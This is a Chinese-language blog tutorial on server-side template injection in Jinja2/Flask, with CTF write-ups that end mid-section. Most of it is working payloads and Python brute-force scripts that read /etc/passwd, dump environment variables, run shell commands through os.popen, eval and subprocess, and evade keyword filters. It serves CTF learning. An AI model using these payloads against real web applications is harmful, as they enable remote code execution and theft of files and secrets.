

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  <link rel="icon" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  <meta name="referrer" content="no-referrer">
  
    <meta name="description" content="前置知识本篇的继承链的作用就是寻找os模块并利用，我们依然有不用os模块的解法 1&#123;&#123;open(&#x27;&#x2F;flag&#x27;).read()&#125;&#125;  利用逻辑classA 子类 base方法找父类，object是最顶端，mro方法向上找所有父类，subclasses方法向下找所有子类 常用注入模块1.文件读取1&lt;class &#x27;_froze">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI入门">
<meta property="og:url" content="https://www.sunynov.top/2026/02/01/SSTI%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="前置知识本篇的继承链的作用就是寻找os模块并利用，我们依然有不用os模块的解法 1&#123;&#123;open(&#x27;&#x2F;flag&#x27;).read()&#125;&#125;  利用逻辑classA 子类 base方法找父类，object是最顶端，mro方法向上找所有父类，subclasses方法向下找所有子类 常用注入模块1.文件读取1&lt;class &#x27;_froze">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697f08b41535a8fb9d25a98c.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697ef5c91535a8fb9d256b49.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697efddc1535a8fb9d2589a9.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697f00131535a8fb9d2589b1.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697f02081535a8fb9d2589bc.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/697f100e1535a8fb9d25ad0d.png">
<meta property="article:published_time" content="2026-02-01T04:12:54.000Z">
<meta property="article:modified_time" content="2026-02-04T08:54:32.224Z">
<meta property="article:author" content="suny">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/697f08b41535a8fb9d25a98c.png">
  
  
  
  <title>SSTI入门 - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.sunynov.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://pic.imgdb.cn/item/62c579525be16ec74a579b15.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SSTI入门"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-02-01 12:12" pubdate>
          2026年2月1日 中午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">SSTI入门</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年2月4日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h1><p>本篇的继承链的作用就是寻找os模块并利用，我们依然有不用os模块的解法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Plain">&#123;&#123;open(&#x27;/flag&#x27;).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="利用逻辑"><a href="#利用逻辑" class="headerlink" title="利用逻辑"></a>利用逻辑</h3><p>classA 子类</p>
<p>base方法找父类，object是最顶端，mro方法向上找所有父类，subclasses方法向下找所有子类</p>
<h3 id="常用注入模块"><a href="#常用注入模块" class="headerlink" title="常用注入模块"></a>常用注入模块</h3><h4 id="1-文件读取"><a href="#1-文件读取" class="headerlink" title="1.文件读取"></a>1.文件读取</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Plain">&lt;class &#x27;_frozen_importlib_external.FileLoader&#x27;&gt;<br></code></pre></td></tr></table></figure>

<p>要找到这个fileloader模块</p>
<h5 id="python脚本查找"><a href="#python脚本查找" class="headerlink" title="python脚本查找"></a>python脚本查找</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br>url=<span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;]&#125;&#125;&quot;</span>&#125;<br>    <span class="hljs-comment">#name是提交数据的名字，根据不同题目变换</span><br>    <span class="hljs-keyword">try</span>:<br>        response=requests.post(url,data=data)<span class="hljs-comment">#提交方式也要注意</span><br>        <span class="hljs-comment">#print(response.text)</span><br>        <span class="hljs-keyword">if</span> response.status_code==<span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;_frozen_importlib_external.FileLoader&#x27;</span> <span class="hljs-keyword">in</span> response.text:<br>            <span class="hljs-comment">#查找所需子类_frozen_importlib_external.FileLoader</span><br>                <span class="hljs-built_in">print</span>(i)<br>        <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<h5 id="fileloader模块的利用方式"><a href="#fileloader模块的利用方式" class="headerlink" title="fileloader模块的利用方式"></a>fileloader模块的利用方式</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__mro__[<span class="hljs-number">1</span>].__subclasses__()[<span class="hljs-number">79</span>][<span class="hljs-string">&quot;get_data&quot;</span>](<span class="hljs-number">0</span>,<span class="hljs-string">&quot;/etc/passwd&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>找到fileloader模块后就可以get data读取文件（subclasses后面不一定是79，要根据实际情况找），第一个参数是0保持不变，第二个就是要查看的文件路径</p>
<h4 id="2-内嵌函数eval执行命令"><a href="#2-内嵌函数eval执行命令" class="headerlink" title="2.内嵌函数eval执行命令"></a>2.内嵌函数eval执行命令</h4><h5 id="python脚本查看可以利用内建函数eval的模块"><a href="#python脚本查看可以利用内建函数eval的模块" class="headerlink" title="python脚本查看可以利用内建函数eval的模块"></a>python脚本查看可以利用内建函数eval的模块</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br>url=<span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;].__init__.__globals__[&#x27;__builtins__&#x27;]&#125;&#125;&quot;</span>&#125;<br>    <span class="hljs-comment">#不同靶场name的值要改</span><br>    <span class="hljs-keyword">try</span>:<br>        response=requests.post(url,data=data)<span class="hljs-comment">#请求方式也要注意</span><br>        <span class="hljs-comment">#print(response.text)</span><br>        <span class="hljs-keyword">if</span> response.status_code==<span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;eval&#x27;</span> <span class="hljs-keyword">in</span> response.text:<br>                <span class="hljs-built_in">print</span>(i)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>可能会有很多都有eval函数，随便选一个用就行</p>
<p>eval函数用法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">65</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&#x27;__import__(&quot;os&quot;).popen(&quot;cat /etc/passwd&quot;).read()&#x27;</span>)&#125;&#125;<span class="hljs-comment">#加上read有回显</span><br></code></pre></td></tr></table></figure>

<h4 id="3-os模块执行命令"><a href="#3-os模块执行命令" class="headerlink" title="3.os模块执行命令"></a>3.os模块执行命令</h4><h5 id="在其他函数中直接调用os模块"><a href="#在其他函数中直接调用os模块" class="headerlink" title="在其他函数中直接调用os模块"></a>在其他函数中直接调用os模块</h5><p>通过config调用os</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;config.__class__.__init__.__globals__[<span class="hljs-string">&#x27;os&#x27;</span>].popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>通过url_for调用os</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;url_for.__globals__.os.popen(<span class="hljs-string">&#x27;whoami&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>在已经加载os模块的子类里直接调用os模块</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">199</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&quot;ls /&quot;</span>).read()&#125;&#125;<br>&#123;&#123;().__class__.__bases__[<span class="hljs-number">0</span>].__subclasses__()[<span class="hljs-number">64</span>].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;ls /&#x27;)&quot;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h5 id="python脚本查找已经加载os模块的子类"><a href="#python脚本查找已经加载os模块的子类" class="headerlink" title="python脚本查找已经加载os模块的子类"></a>python脚本查找已经加载os模块的子类</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br>url=<span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;].__init__.__globals__&#125;&#125;&quot;</span>&#125;<br>    <span class="hljs-keyword">try</span>:<br>        response=requests.post(url,data=data)<br>        <span class="hljs-comment">#print(response.text)</span><br>        <span class="hljs-keyword">if</span> response.status_code==<span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;os.py&#x27;</span> <span class="hljs-keyword">in</span> responst.text:<br>                <span class="hljs-built_in">print</span>(i)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<h4 id="4-importlib类执行命令"><a href="#4-importlib类执行命令" class="headerlink" title="4.importlib类执行命令"></a>4.importlib类执行命令</h4><p>可以加载第三方库，使用load_module加载os</p>
<h5 id="python脚本查找-1"><a href="#python脚本查找-1" class="headerlink" title="python脚本查找"></a>python脚本查找</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs Plain">_frozen_importlib.BuiltinImporter<br>import requests<br>url=&#x27;&#x27;<br>for i in range(500):<br>    data=&#123;&quot;name&quot;:&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;+str(i)+&quot;]&#125;&#125;&quot;&#125;<br>    try:<br>        response=requests.post(url,data=data)<br>        if response.status_code==200:<br>            if &#x27;_frozen_importlib.BuiltinImporter&#x27; in response.text:<br>                print(i)<br>    except:<br>        pass<br></code></pre></td></tr></table></figure>

<h5 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">69</span>][<span class="hljs-string">&quot;load_module&quot;</span>](<span class="hljs-string">&quot;os&quot;</span>)[<span class="hljs-string">&quot;popen&quot;</span>](<span class="hljs-string">&quot;ls /&quot;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h4 id="5-linecache函数执行命令"><a href="#5-linecache函数执行命令" class="headerlink" title="5.linecache函数执行命令"></a>5.linecache函数执行命令</h4><p>linecache函数可用于读取任意一个文件的某一行，而这个函数中也引入了os模块，所以我们也可以利用这个linecache函数去执行命令</p>
<h5 id="python脚本查找-2"><a href="#python脚本查找-2" class="headerlink" title="python脚本查找"></a>python脚本查找</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br>url=<span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;].__init__.__globals__&#125;&#125;&quot;</span>&#125;<br>    <span class="hljs-keyword">try</span>:<br>        response=requests.post(url,data=data)<br>        <span class="hljs-keyword">if</span> response.status_code==<span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;linecache&#x27;</span> <span class="hljs-keyword">in</span> response.text:<br>                <span class="hljs-built_in">print</span>(i)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<h5 id="用法-1"><a href="#用法-1" class="headerlink" title="用法"></a>用法</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;().__class__.__base__.__subclasses__()[<span class="hljs-number">191</span>].__init__.__globals__[<span class="hljs-string">&#x27;linecache&#x27;</span>][<span class="hljs-string">&#x27;os&#x27;</span>].popen(<span class="hljs-string">&quot;ls /&quot;</span>).read()&#125;&#125;<br>&#123;&#123;().__class__.__base__.__subclasses__()[<span class="hljs-number">192</span>].__init__.__globals__.linecache.os.popen(<span class="hljs-string">&quot;ls /&quot;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h4 id="6-subprocess-Popen类执行命令"><a href="#6-subprocess-Popen类执行命令" class="headerlink" title="6.subprocess.Popen类执行命令"></a>6.subprocess.Popen类执行命令</h4><p>从python2.4版本开始，可以用subprocess这个模块来产生子进程，并连接到子进程的标准输入&#x2F;输出&#x2F;错误中去，还可以得到子进程的返回值。</p>
<p>subprocess意在替代其他几个老的模块或者函数，比如os.system或者os.popen等函数</p>
<h5 id="python脚本查找-3"><a href="#python脚本查找-3" class="headerlink" title="python脚本查找"></a>python脚本查找</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests<br>url=<span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">500</span>):<br>    data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;&#123;&#123;().__class__.__base__.__subclasses__()[&quot;</span>+<span class="hljs-built_in">str</span>(i)+<span class="hljs-string">&quot;]&#125;&#125;&quot;</span>&#125;<br>    <span class="hljs-keyword">try</span>:<br>        response=requests.post(url,data=data)<br>        <span class="hljs-keyword">if</span> response.status_code==<span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;subprocess.Popen&#x27;</span> <span class="hljs-keyword">in</span> response.text:<br>                <span class="hljs-built_in">print</span>(i)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>用法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">200</span>](<span class="hljs-string">&#x27;ls /&#x27;</span>,shell=<span class="hljs-literal">True</span>,stdout=-<span class="hljs-number">1</span>).communicate()[<span class="hljs-number">0</span>].strip()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h1 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h1><h2 id="PCTF2025-复读机"><a href="#PCTF2025-复读机" class="headerlink" title="[PCTF2025]复读机"></a>[PCTF2025]复读机</h2><p>非常简单的SSTI，没有过滤，直接用config链</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">config.__class__.__init__.__globals__</span>[&#x27;os&#x27;].popen(<span class="hljs-name">&#x27;env&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/697f08b41535a8fb9d25a98c.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="SDPCSEC第一次纳新-reallogin"><a href="#SDPCSEC第一次纳新-reallogin" class="headerlink" title="[SDPCSEC第一次纳新]reallogin"></a>[SDPCSEC第一次纳新]reallogin</h2><p><img src="https://pic1.imgdb.cn/item/697ef5c91535a8fb9d256b49.png" srcset="/img/loading.gif" lazyload></p>
<p>一个登录页面，渲染用户名，猜测SSTI，测试一下</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">7</span>*<span class="hljs-number">7</span>&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>回显49，有WAF，用burp扫一下</p>
<p><img src="https://pic1.imgdb.cn/item/697efddc1535a8fb9d2589a9.png" srcset="/img/loading.gif" lazyload></p>
<p>点字符和一些关键字被ban了</p>
<p>这里我选择用cycler的链子+拼写绕过</p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs prolog">&#123;&#123;(cycler[<span class="hljs-string">&#x27;next&#x27;</span>][<span class="hljs-string">&#x27;__g&#x27;</span><span class="hljs-string">&#x27;lobals__&#x27;</span>][<span class="hljs-string">&#x27;o&#x27;</span><span class="hljs-string">&#x27;s&#x27;</span>][<span class="hljs-string">&#x27;p&#x27;</span><span class="hljs-string">&#x27;open&#x27;</span>](<span class="hljs-string">&#x27;cat /f*&#x27;</span>))[<span class="hljs-string">&#x27;read&#x27;</span>]()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/697f00131535a8fb9d2589b1.png" srcset="/img/loading.gif" lazyload></p>
<p>wp用的是通用对象链，先查询子类</p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs prolog">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__cla&#x27;</span>+<span class="hljs-string">&#x27;ss__&#x27;</span>][<span class="hljs-string">&#x27;__ba&#x27;</span>+<span class="hljs-string">&#x27;ses__&#x27;</span>][<span class="hljs-number">0</span>][<span class="hljs-string">&#x27;__subc&#x27;</span>+<span class="hljs-string">&#x27;lasses__&#x27;</span>]()&#125;&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/697f02081535a8fb9d2589bc.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs prolog">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__cla&#x27;</span>+<span class="hljs-string">&#x27;ss__&#x27;</span>][<span class="hljs-string">&#x27;__ba&#x27;</span>+<span class="hljs-string">&#x27;ses__&#x27;</span>][<span class="hljs-number">0</span>][<span class="hljs-string">&#x27;__subc&#x27;</span>+<span class="hljs-string">&#x27;lasses__&#x27;</span>]()[<span class="hljs-number">132</span>][<span class="hljs-string">&#x27;__in&#x27;</span>+<span class="hljs-string">&#x27;it__&#x27;</span>][<span class="hljs-string">&#x27;__glo&#x27;</span>+<span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span>+<span class="hljs-string">&#x27;pen&#x27;</span>]<br>(<span class="hljs-string">&#x27;cat /f*&#x27;</span>)|attr(<span class="hljs-string">&#x27;read&#x27;</span>)()&#125;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="BaseCTF2024-复读机"><a href="#BaseCTF2024-复读机" class="headerlink" title="[BaseCTF2024]复读机"></a>[BaseCTF2024]复读机</h2><p>算是上面那个的进阶版，过滤了很多字符和关键字，而且设定了格式和括号匹配所以测起来比较麻烦</p>
<p><img src="https://pic1.imgdb.cn/item/697f100e1535a8fb9d25ad0d.png" srcset="/img/loading.gif" lazyload></p>


一定要用BaseCTF{%print()}包裹，不然测不出来

